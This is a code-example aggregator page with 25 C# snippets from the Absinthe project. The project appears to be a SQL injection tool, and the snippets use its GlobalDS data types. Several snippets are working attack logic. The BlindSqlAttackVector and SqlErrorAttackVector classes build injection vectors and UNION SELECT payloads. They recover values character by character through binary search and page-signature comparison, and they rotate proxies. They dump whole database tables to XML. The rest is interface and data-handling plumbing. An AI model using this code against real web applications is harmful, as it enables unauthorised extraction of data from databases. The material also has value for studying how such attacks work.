GlobalDS C# (CSharp) Exemples de code

Exemple #1

0

Afficher le fichier

Fichier : BlindSqlAttackVector.cs Projet : QardenEden/Absinthe

		/// <summary>Takes a partially built schema and continues to download what is left</summary>
		/// <param name="RecoveredList">The preexisting schema</param>
		/// <returns>The fully downloaded schema</returns>
		public GlobalDS.Table[] RecoverTableList(GlobalDS.Table[] RecoveredList)
		{
			long[] TableIDs;
			int TableCount;
			List<GlobalDS.Table> retVal = new List<GlobalDS.Table>();
            List<long> tempTableIDs = new List<long>();

			UserStatus("Recovering Table List");

			foreach (GlobalDS.Table tbl in RecoveredList)
				tempTableIDs.Add(tbl.ObjectID);
			
			TableIDs = GetTableIDs(tempTableIDs.ToArray());
			retVal = new List<GlobalDS.Table>(RecoveredList);

			TableCount = TableIDs.Length;
			GlobalDS.Table NewTable;
						
			for (int i=0; i < TableCount; i++)
			{
				if (RecoveredList.Length < i || RecoveredList[i].Name.Length == 0)
				{
					NewTable = RetrieveTable(TableIDs[i]);
					retVal.Add(NewTable);
					TableChanged(NewTable);
				}
			}

            return retVal.ToArray();
		}

Exemple #2

0

Afficher le fichier

Fichier : BlindSqlAttackVector.cs Projet : QardenEden/Absinthe

		// }}}

		// {{{ IteratePrimaryKey
		private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
		{
			switch(PrimaryKeyType)
			{
				case SqlDbType.BigInt:
				case SqlDbType.SmallInt:
				case SqlDbType.TinyInt:
				case SqlDbType.Int:
					return IterateIntegerPrimaryKey(TableName, KeyName, CurrentPrimaryKey);
				default:
					return IterateNonIntegerPrimaryKey(TableName, KeyName, CurrentPrimaryKey);
			}
		}

Exemple #3

0

Afficher le fichier

Fichier : Absinthe.cs Projet : QardenEden/Absinthe

        private void TargetAttackVector_TableChanged(GlobalDS.Table ChangedTable)
        {
            lock (_ThreadGuiMutex)
            {
                _LocalGuiQueue.Enqueue(LocalGuiAction.PartialTableInfo);
                _LocalGuiQueue.Enqueue(ChangedTable);
            }

            this.Invoke(new ThreadedSub(UnSafelyUpdateUI));
            _AbsintheState.PartialTable = ChangedTable;
        }

Exemple #4

0

Afficher le fichier

Fichier : DataStore.cs Projet : QardenEden/Absinthe

		/// <summary>Sets the authentication data</summary>
		/// <param name="AuthType">The authentication type</param>
		/// <param name="Username">The authentication username</param>
		/// <param name="Password">The authentication password</param>
        public void Authdata(GlobalDS.AuthType AuthType, string Username, string Password)
		{
			_AuthUser = Username;
			_AuthPassword = Password;
			_AuthDomain = string.Empty;

            if (AuthType == GlobalDS.AuthType.None)
			{
				Authdata(AuthType); return;
			}

			_AuthenticationMethod = AuthType;

            if (AuthType == GlobalDS.AuthType.NTLM)
			{
                _AuthenticationMethod = GlobalDS.AuthType.Basic;
				throw new Exception("Missing Domain information, AuthType set to 'Basic'");
			}

		}

Exemple #5

0

Afficher le fichier

Fichier : SqlErrorAttackVector.cs Projet : QardenEden/Absinthe

		// }}}
		
		// {{{ PullDataFromIndividualTable
		private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
		{
			List<Hashtable> retVal = new List<Hashtable>();
			long RecordCounter = 0;
			GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
			GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
			int ColumnCounter = 0;
			string PrimaryKeyName = String.Empty;
			SqlDbType PrimaryKeyType= SqlDbType.Int;

			UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));

			// Generate Field List
			for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
			{
				UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));

				if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
				{
					ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
					ColumnCounter++;
				}

				if (SrcTable.FieldList[FieldCounter].IsPrimary)
				{
					PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
					PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
				}
			}

			if (PrimaryKeyName.Length > 0)
			{
				for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
				{
					CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
					Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
					retVal.Add(Record);
					OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
				}
			}

			return retVal;
		}

Exemple #6

0

Afficher le fichier

Fichier : SqlErrorAttackVector.cs Projet : QardenEden/Absinthe

		// }}}

		// {{{ GetFieldData
		private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
		{
			DictionaryEntry retVal = new DictionaryEntry();

			retVal.Key = Column.FieldName;
			retVal.Value = string.Empty;

			if (Column.FieldName.Equals(pk.Name))
			{
				retVal.Value = pk.Value;
				return retVal;
			}

			StringBuilder SelectClause = new StringBuilder();
			

			switch (Column.DataType)
			{
				case SqlDbType.BigInt: case SqlDbType.SmallInt: case SqlDbType.TinyInt:
				case SqlDbType.Int: case SqlDbType.Decimal: case SqlDbType.DateTime:
				case SqlDbType.Money: case SqlDbType.Float: case SqlDbType.Real:
				case SqlDbType.SmallDateTime: case SqlDbType.SmallMoney: case SqlDbType.Timestamp:
				case SqlDbType.UniqueIdentifier:
					//retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
					SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");

					break;
				case SqlDbType.NChar: case SqlDbType.Char: case SqlDbType.NVarChar:
				case SqlDbType.Text: case SqlDbType.NText: case SqlDbType.VarChar:
					//retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
					SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
					break;
				case SqlDbType.Bit:
					//retVal.Value = GetBitField(Column.FieldName, TableName, pk);	
					SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
					break;
				case SqlDbType.Image: case SqlDbType.Binary: case SqlDbType.VarBinary:
					// TODO: Figure out how to support this!
					//retVal.Value = null;
					break;
			}

			_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);
			

			string ResultPage =  httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
			string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

			retVal.Value = ResultText.Substring(1, ResultText.Length - 2);

			return retVal;
		}

Exemple #7

0

Afficher le fichier

Fichier : BlindSqlAttackVector.cs Projet : QardenEden/Absinthe

		// }}}

		// {{{ IterateNonIntegerPrimaryKey
		private GlobalDS.PrimaryKey IterateNonIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey)
		{
			StringBuilder CurrentVector = new StringBuilder();
			CurrentVector.Append(_VectorBuffer);

			if (CurrentPrimaryKey.Name == KeyName)
			{
				CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value)));
			}
			else
			{
				CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName)));
			}

			long Size = RecursiveSearch(1,0,CurrentVector.ToString());

			StringBuilder KeyValueBuilder = new StringBuilder();
			StringBuilder KeyOutputValueBuilder = new StringBuilder();
			for (long AscCounter = 1; AscCounter <= Size; AscCounter++)
			{
				CurrentVector = new StringBuilder();
				CurrentVector.Append(_VectorBuffer);

				if (CurrentPrimaryKey.Name == KeyName)
				{
					CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName, CurrentPrimaryKey.Value)));
				}
				else
				{
					CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName)));
				}

				long SearchVal = RecursiveSearch( 1, UNICODE_LIMIT, CurrentVector.ToString());
				KeyValueBuilder.Append(_PluginData.CharConversionFunction(SearchVal)).Append(_PluginData.ConcatenationCharacter);
				KeyOutputValueBuilder.Append(Convert.ToChar(SearchVal));
			}	

			KeyValueBuilder.Remove(KeyValueBuilder.Length - _PluginData.ConcatenationCharacter.Length, _PluginData.ConcatenationCharacter.Length);

			GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
			retVal.Name = KeyName;
			//TODO: We should escape this with apostrophes most likely
			retVal.Value = KeyValueBuilder.ToString();
			retVal.OutputValue = KeyOutputValueBuilder.ToString();


			return retVal;
		}

Exemple #8

0

Afficher le fichier

Fichier : SqlErrorAttackVector.cs Projet : QardenEden/Absinthe

		/// <summary>Takes a partially built schema and continues to download what is left</summary>
		/// <param name="RecoveredList">The preexisting schema</param>
		/// <returns>The fully downloaded schema</returns>
		public GlobalDS.Table[] RecoverTableList(GlobalDS.Table[] RecoveredList)
		{ 
			long TableCount;
			List<GlobalDS.Table> retVal = new List<GlobalDS.Table>(RecoveredList);
 
			TableCount = GetTableCount();
			GlobalDS.Table NewTable;
			UserStatus(String.Format("Table Count: {0}", TableCount));
			long PreviousTableID;
				
			for (int i=RecoveredList.Length; i < TableCount; i++)
			{
				if (i == 0)
					PreviousTableID = 0;
				else
					PreviousTableID = ((GlobalDS.Table) retVal[i-1]).ObjectID;
				
				NewTable = RetrieveTable(PreviousTableID);
				retVal.Add(NewTable);
				TableChanged(NewTable);
			}

			return retVal.ToArray();
		}

Exemple #9

0

Afficher le fichier

Fichier : DataStore.cs Projet : QardenEden/Absinthe

		private void TableChanged(GlobalDS.Table ChangedTable)
		{
			PartialTable = ChangedTable;
		}

Exemple #10

0

Afficher le fichier

Fichier : DataStore.cs Projet : QardenEden/Absinthe

		private void WriteFieldToXml(ref XmlTextWriter xOutput, GlobalDS.Table Tbl)
		{
			for (int i = 0; i < Tbl.FieldCount; i++)
			{
				xOutput.WriteStartElement("field");

				xOutput.WriteStartAttribute("id", null);
				xOutput.WriteString((i+1).ToString());
				xOutput.WriteEndAttribute();

				xOutput.WriteStartAttribute("name", null);
				xOutput.WriteString(Tbl.FieldList[i].FieldName);
				xOutput.WriteEndAttribute();

				xOutput.WriteStartAttribute("datatype", null);
				xOutput.WriteString(Tbl.FieldList[i].DataType.ToString());
				xOutput.WriteEndAttribute();

				if (Tbl.FieldList[i].IsPrimary)
				{
					xOutput.WriteStartAttribute("primary", null);
					xOutput.WriteString(true.ToString().ToLower());
					xOutput.WriteEndAttribute();
				}
				
				xOutput.WriteEndElement();
			}
		}

Exemple #11

0

Afficher le fichier

Fichier : DataStore.cs Projet : QardenEden/Absinthe

 public void AddCookie(GlobalDS.FormParam value)
 {
     _Cookies.Add(value.Name, value.DefaultValue);
 }

Exemple #12

0

Afficher le fichier

Fichier : DataStore.cs Projet : QardenEden/Absinthe

		///<summary>Adds a form parameter for use during the attack</summary>
		///<param name="value">The FormParam object containing the relevant parameter information</param>
        public void AddFormParameter(GlobalDS.FormParam value)
		{
			//_ParentOutput("There are {0} keys in the Parameter list!", _ParamList.Count);
			_ParamList[value.Name] =  value;
		}

Exemple #13

0

Afficher le fichier

Fichier : DataStore.cs Projet : QardenEden/Absinthe

		/// <summary>Sets the authentication data</summary>
		/// <param name="AuthType">The authentication type</param>
		/// <param name="Credentials">The authentication credentials</param>
        public void Authdata(GlobalDS.AuthType AuthType, System.Net.NetworkCredential Credentials)
		{
			_AuthUser = Credentials.UserName;
			_AuthPassword = Credentials.Password;
			_AuthDomain = Credentials.Domain;

            if (AuthType == GlobalDS.AuthType.None)
			{
				Authdata(AuthType); return;
			}

			_AuthenticationMethod = AuthType;

            if (AuthType != GlobalDS.AuthType.NTLM)
				_AuthDomain = string.Empty;
		
		}

Exemple #14

0

Afficher le fichier

Fichier : SqlErrorAttackVector.cs Projet : QardenEden/Absinthe

		private void OutputRecordToFile(ref XmlTextWriter xOutput, Hashtable DataRecord, GlobalDS.PrimaryKey pk)
		{
			xOutput.WriteStartElement("DataRecord");
			xOutput.WriteStartAttribute("PrimaryKey", null);
			xOutput.WriteString(pk.Name);
			xOutput.WriteEndAttribute();
			xOutput.WriteStartAttribute("PrimaryKeyValue", null);
			xOutput.WriteString(pk.OutputValue);
			xOutput.WriteEndAttribute();

			foreach(string Key in DataRecord.Keys)
			{
				xOutput.WriteStartElement(Key);
				xOutput.WriteString(DataRecord[Key].ToString());	
				xOutput.WriteEndElement();
			}

			xOutput.WriteEndElement();
		}

Exemple #15

0

Afficher le fichier

Fichier : BlindSqlAttackVector.cs Projet : QardenEden/Absinthe

		// }}}

		// {{{ IterateIntegerPrimaryKey
		private GlobalDS.PrimaryKey IterateIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey)
		{
			StringBuilder CurrentVector = new StringBuilder();
			CurrentVector.Append(_VectorBuffer);

			if (CurrentPrimaryKey.Name == KeyName)
			{
				CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value)));
			}
			else
			{	
				CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName)));
			}

			// Is there a way to force this to be numeric?!
			long Result = RecursiveSearch(1,0,CurrentVector.ToString());

			GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
			retVal.Name = KeyName;
			retVal.Value = Result.ToString();
			retVal.OutputValue = Result.ToString();

			return retVal;
		}

Exemple #16

0

Afficher le fichier

Fichier : SqlErrorAttackVector.cs Projet : QardenEden/Absinthe

		/// <summary>
		/// Retrieves the table schema of an injected database
		/// </summary>
		/// <param name="TableData">The table data this should be stored into</param>
		public void PopulateTableStructure(ref GlobalDS.Table TableData)
		{			 
			int FieldCount;

			FieldCount = GetFieldCount(TableData.ObjectID);	
			
			for (int i=0; i < FieldCount; i++)
			{	
				TableData.AddField(GetFieldData(TableData.ObjectID, i));
			}
		}

Exemple #17

0

Afficher le fichier

Fichier : BlindSqlAttackVector.cs Projet : QardenEden/Absinthe

		// }}}

		// {{{ GetFieldData
		private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
		{
			DictionaryEntry retVal = new DictionaryEntry();

			retVal.Key = Column.FieldName;
			retVal.Value = string.Empty;

			if (Column.FieldName.Equals(pk.Name))
			{
				retVal.Value = pk.OutputValue;
				return retVal;
			}

			if (true == TestNull(Column.FieldName, TableName, pk)) 
			{ //retVal.Value = null; 
			}
			else
			{

				switch (Column.DataType)
				{
					case SqlDbType.BigInt:
					case SqlDbType.SmallInt:
					case SqlDbType.TinyInt:
					case SqlDbType.Int:
						retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
						break;
					case SqlDbType.NChar:
					case SqlDbType.Char:
					case SqlDbType.NVarChar:
					case SqlDbType.Text:
					case SqlDbType.NText:
					case SqlDbType.VarChar:
						retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
						break;
					case SqlDbType.Decimal:
					case SqlDbType.DateTime:
					case SqlDbType.Money:
					case SqlDbType.Float:
					case SqlDbType.Real:
					case SqlDbType.SmallDateTime:
					case SqlDbType.SmallMoney:
					case SqlDbType.Timestamp:
					case SqlDbType.UniqueIdentifier:
						retVal.Value = GetConvertedFieldData(Column.FieldName, TableName, pk);	
						break;
					case SqlDbType.Bit:
						retVal.Value = GetBitField(Column.FieldName, TableName, pk);	
						break;
					case SqlDbType.Image:
					case SqlDbType.Binary:
					case SqlDbType.VarBinary:
						// TODO: Figure out how to support this!
						//retVal.Value = null;
						break;
				}
			}

			return retVal;
		}

Exemple #18

0

Afficher le fichier

Fichier : SqlErrorAttackVector.cs Projet : QardenEden/Absinthe

		/// <summary>Downloads the contents of the given fields and tables from the database to an XML file.</summary>
		/// <param name="SrcTable">An array of the tables to pull data from</param>
		/// <param name="ColumnIDs">An array of the column lists to be pulled from the database.
		/// The indices from this array should match up with the indices of the SrcTable.</param>
		/// <param name="xmlFilename">The filename to write the downloaded XML data to.</param>
		public void PullDataFromTable(GlobalDS.Table[] SrcTable, long[][] ColumnIDs, string xmlFilename)
		{
			int TableCount;
			if (xmlFilename.Length == 0) throw new System.Exception(" No File Defined. ");

			XmlTextWriter xOutput = new XmlTextWriter(xmlFilename, System.Text.Encoding.UTF8);
			xOutput.Formatting = Formatting.Indented;
			xOutput.Indentation = 4;
			xOutput.WriteStartDocument();

			xOutput.WriteStartElement("AbsinthedatabasePull");
			xOutput.WriteStartAttribute("version", null);
			xOutput.WriteString("1.0");
			xOutput.WriteEndAttribute();

			try
			{
				for (TableCount = 0; TableCount < SrcTable.Length; TableCount++)
				{
					PullDataFromIndividualTable(SrcTable[TableCount], ColumnIDs[TableCount], ref xOutput);
				}
			}
			catch (Exception e)
			{
				UserStatus(e.ToString());
			}
			finally
			{
				xOutput.WriteEndElement();
				xOutput.WriteEndDocument();
				xOutput.Close();
			}
		}

Exemple #19

0

Afficher le fichier

Fichier : BlindSqlAttackVector.cs Projet : QardenEden/Absinthe

		// }}}

		// {{{ GetBitField
		private int GetBitField(string FieldName, string TableName, GlobalDS.PrimaryKey pk)
		{
			StringBuilder CurrentVector = new StringBuilder();
			CurrentVector.Append(_VectorBuffer);
			CurrentVector.Append(_PluginData.AndEqualWrapper(_PluginData.SelectValueForGivenPrimaryKey(FieldName, TableName, pk)));
			CurrentVector.Append(" 0");

			_AttackParams[_VectorName] = CurrentVector + _VectorPostBuffer;

			string ResultPage = string.Empty;
			bool Response200 = true;

			WebProxy Proxy = RotatedProxy();

			try
			{
				ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, Proxy, _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
			}
			catch(WebException wex)
			{
				// Adding this as requested by Tom
				if (((HttpWebResponse)wex.Response).StatusCode == HttpStatusCode.InternalServerError)
					Response200 = false;
				else
					throw;
			}
			if (_Options.Throttle > 0) Thread.Sleep(_Options.Throttle);

			double[] resSig = null;
			if (!FilterOn500s)
				resSig = ParsePage.GetHtmlPageSignature(ResultPage, _Options.Delimiter);

			if ((FilterOn500s && Response200) || (!FilterOn500s && ParsePage.CompareSignatures(TruePageSignature, resSig, TrueFilter, _Options.Tolerance)))
			{
				return 0;
			}
			else if ((FilterOn500s && !Response200) || (!FilterOn500s && ParsePage.CompareSignatures(FalsePageSignature, resSig, FalseFilter, _Options.Tolerance)))
			{
				return 1;
			}
			else
			{
				UserStatus("Uh oh.. Error page maybe?");
				return -1;
			}
		}

Exemple #20

0

Afficher le fichier

Fichier : SqlErrorAttackVector.cs Projet : QardenEden/Absinthe

		// }}}

		// {{{ GetRecord
		private Hashtable GetRecord(string TableName, GlobalDS.Field[] Columns, GlobalDS.PrimaryKey pk)
		{
			int ColumnCounter;
			Hashtable retVal = new Hashtable();

			for (ColumnCounter = 0; ColumnCounter < Columns.Length; ColumnCounter++)
			{
				DictionaryEntry de = GetFieldData(TableName, Columns[ColumnCounter], pk);
				retVal.Add(de.Key, de.Value);
			}

			return retVal;
		}

Exemple #21

0

Afficher le fichier

Fichier : BlindSqlAttackVector.cs Projet : QardenEden/Absinthe

		// }}}

		// {{{ GetConvertedFieldData
		private string GetConvertedFieldData(string FieldName, string TableName, GlobalDS.PrimaryKey pk)
		{

			StringBuilder FieldBuilder = new StringBuilder();
			StringBuilder CurrentVector = new StringBuilder();
			CurrentVector.Append(_VectorBuffer);
			CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.SelectLengthOfConvertedRecordValue(FieldName, TableName, pk)));

			long Size = RecursiveSearch(1,0,CurrentVector.ToString());

			for (long AscCounter = 1; AscCounter <= Size; AscCounter++)
			{
				CurrentVector = new StringBuilder();
				CurrentVector.Append(_VectorBuffer);
				CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.SelectCharacterValueForConvertedRecordValue(AscCounter, FieldName, TableName, pk)));
				FieldBuilder.Append(Convert.ToChar( RecursiveSearch( 1, UNICODE_LIMIT, CurrentVector.ToString() )));
			}	

			return FieldBuilder.ToString();
		}

Exemple #22

0

Afficher le fichier

Fichier : SqlErrorAttackVector.cs Projet : QardenEden/Absinthe

		private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
		{
			StringBuilder WhereClause = new StringBuilder();

			if (CurrentPrimaryKey.Name == KeyName)
			{
				WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
			}

			_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());

			string ResultPage =  httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
			string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

			ResultText = ResultText.Substring(1, ResultText.Length-2);						

			string WorkingText = "";
			switch(PrimaryKeyType)
			{
				case SqlDbType.VarChar: case SqlDbType.Char: case SqlDbType.NChar: case SqlDbType.NText: 
				case SqlDbType.NVarChar: case SqlDbType.Text: 
					StringBuilder ElementBuilder = new StringBuilder();

					//split
					char[] TextElements = ResultText.ToCharArray();
					for (int i=0; i < TextElements.Length; i++)
					{
						ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
					}
					ElementBuilder.Remove(ElementBuilder.Length -2,2); // remove trailing '+ '

					WorkingText = ElementBuilder.ToString();
					break;

				default:
					WorkingText = ResultText.Trim();
					break;
			}
				


			GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
			retVal.Name = KeyName;
			retVal.Value = WorkingText;
			retVal.OutputValue = ResultText;

			return retVal;
		}

Exemple #23

0

Afficher le fichier

Fichier : BlindSqlAttackVector.cs Projet : QardenEden/Absinthe

		///<summary>Retrieve the information about the fields for a given table from the database schema.</summary>
		///<param name="TableData">The table to load field info for.</param>
		public void PopulateTableStructure(ref GlobalDS.Table TableData)
		{
			long[] FieldIDs;
			long PrimaryKey;
			int FieldCount;

			FieldIDs = GetFieldIDs(TableData.ObjectID);

			FieldCount = FieldIDs.Length;

			PrimaryKey = RetrievePrimaryKey(TableData.ObjectID);	

			for (int i=0; i < FieldCount; i++)
			{
				TableData.AddField(RetrieveField(FieldIDs[i], TableData.ObjectID, PrimaryKey));
			}
		}

Exemple #24

0

Afficher le fichier

Fichier : Absinthe.cs Projet : QardenEden/Absinthe

        private void ThreadUnsafeUpdatePartialTable(GlobalDS.Table NewTable)
        {
            // Search for this node
            bool FoundNode = false;
            TreeNode tid = null;
            TreeNode SearchID;

            for (int i=0; i < tvwSchema.Nodes[0].Nodes[1].Nodes.Count; i++)
            {
                SearchID = tvwSchema.Nodes[0].Nodes[1].Nodes[i];

                if (SearchID.Nodes[0].Nodes[0].Text.Equals(NewTable.ObjectID.ToString()))
                {
                    tid = SearchID;
                    FoundNode = true;
                    break;
                }
            }

            if (!FoundNode)
            {
                tid = tvwSchema.Nodes[0].Nodes[1].Nodes.Add(NewTable.Name);
            }

            tid.Nodes.Clear();
            tid.Nodes.Add("ID").Nodes.Add(NewTable.ObjectID.ToString());
            tid.Nodes.Add("Record Count").Nodes.Add(NewTable.RecordCount.ToString());
            tid.Nodes.Add("Fields").Nodes.Add("??? UNKNOWN ???");
        }

Exemple #25

0

Afficher le fichier

Fichier : DataStore.cs Projet : QardenEden/Absinthe

		/// <summary>Sets the Auth data to empty</summary>
		/// <param name="AuthType">The Auth type, although it doesn't matter what it's set to this overload will set it to "None"</param>
        public void Authdata(GlobalDS.AuthType AuthType)
		{
			_AuthUser = string.Empty;
			_AuthPassword = string.Empty;
			_AuthDomain = string.Empty;
            _AuthenticationMethod = GlobalDS.AuthType.None;
            if (AuthType != GlobalDS.AuthType.None)
			{ throw new Exception("Missing Information, AuthType set to 'None'"); }
			return;
		}

C# (CSharp) GlobalDS Exemples